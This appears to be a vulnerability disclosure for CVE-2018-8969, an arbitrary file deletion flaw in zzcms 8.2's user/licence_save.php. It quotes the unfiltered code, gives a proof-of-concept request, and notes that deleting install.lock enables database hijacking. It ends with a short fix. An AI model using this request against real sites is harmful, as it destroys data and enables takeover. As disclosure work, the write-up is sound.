Headline
CVE-2018-8969: vulnerability/licence_save.php.md at master · Ni9htMar3/vulnerability
An issue was discovered in zzcms 8.2. user/licence_save.php allows remote attackers to delete arbitrary files via directory traversal sequences in the oldimg parameter in an action=modify request. This can be leveraged for database access by deleting install.lock.
title
tags
grammar_cjkRuby
licence_save.php
bug
true
user/licence_save.php****Edition :
zzcms 8.2
Location
/user/licence_save.php
Code:
if ($oldimg<>$img && $oldimg<>"/image/nopic.gif"){
$f="…/".$oldimg;
if (file_exists($f)){
unlink($f);
}
$fs="…/".str_replace(".","_small.",$oldimg)."";
if (file_exists($fs)){
unlink($fs);
}
}
Rows : 31****Harm
Allows attackers to delete files arbitrarily
Cause the cause
Through the code can know that we only control oldimg, and it did not carry out the appropriate filtering
first create test.php
Then perform the operation, remember to meet $oldimg<>$img && $oldimg<>"/image/nopic.gif"
Then execute
Then find test.php is gone
poc
GET: http://127.0.0.1:8080/user/licence_save.php?action=modify POST: id=11&oldimg=test.php&img=1231
An attacker can use this vulnerability to delete any file, such as deleting install.lock for CMS reinstall and hijacking the website database.
Solution
Can be filtered through the input of control parameters, strictly control the type of parameters, suffixes